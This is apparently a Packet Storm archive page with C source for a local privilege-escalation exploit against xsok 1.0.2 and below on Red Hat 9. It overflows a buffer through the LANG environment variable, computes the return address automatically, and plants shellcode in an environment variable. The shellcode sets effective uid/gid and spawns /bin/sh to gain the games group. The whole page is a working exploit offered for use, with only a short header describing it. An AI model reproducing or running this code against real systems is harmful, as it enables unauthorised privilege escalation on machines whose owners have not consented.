Local gid=games exploit for xsok v1.0.2 and below that will automatically calculate the return address and has improved shellcode. Tested on RedHat 9.0.
3e6e7fbdfeca585aeec422ec95da58f46f9af1e35a26b5de75fcb316a7db05b6/*
xsok 1.02 local game exploit
coded by n2n, n2n<at>linuxmail.org
Eye on Security Research Group, India http://www.eos-india.net
This exploit calculates the return address automatically.
Also the shellcode is improved and automatically gets the effective uid and gid of the vulnerable binary.
Tested on Redhat Linux 9.0
*/
#define VULN "/usr/X11R6/bin/xsok"
#define BUFLEN 100
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
/* shellcode by me, n2n@linuxmail.org */
char *shellcode=
/* setreuid(geteuid(),geteuid()), no use unless xsok is setuid, usually its only setgid games */
"\x31\xc0\xb0\x31\xcd\x80\x93\x89\xd9\x31\xc0\xb0\x46\xcd\x80"
/* setregid(getegid(),getegid()) */
"\x31\xc0\xb0\x32\xcd\x80\x93\x89\xd9\x31\xc0\xb0\x47\xcd\x80"
/* exec /bin/sh */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
/* exit() */
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
int main(int argc, char **argv)
{
char exploit[BUFLEN+5];
unsigned long addr_ret = 0xc0000000 - 4;
char *arg0 = VULN;
int i;
if (argc > 2) {
fprintf(stderr, "Usage: %s [PROG]\n", argv[0]);
return 1;
}
if (argc > 1)
arg0 = argv[1];
addr_ret -= strlen(arg0) + 1;
addr_ret -= strlen(shellcode) + 1;
setenv("EGG",shellcode,1);
for(i=0;i<BUFLEN;i+=4)
*(unsigned int *)(exploit+i)=addr_ret;
exploit[i]=0x0;
setenv("LANG",exploit,1);
printf("Using RET=%p\n",addr_ret);
execl(arg0,arg0,NULL);
printf("\n");
return 1;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed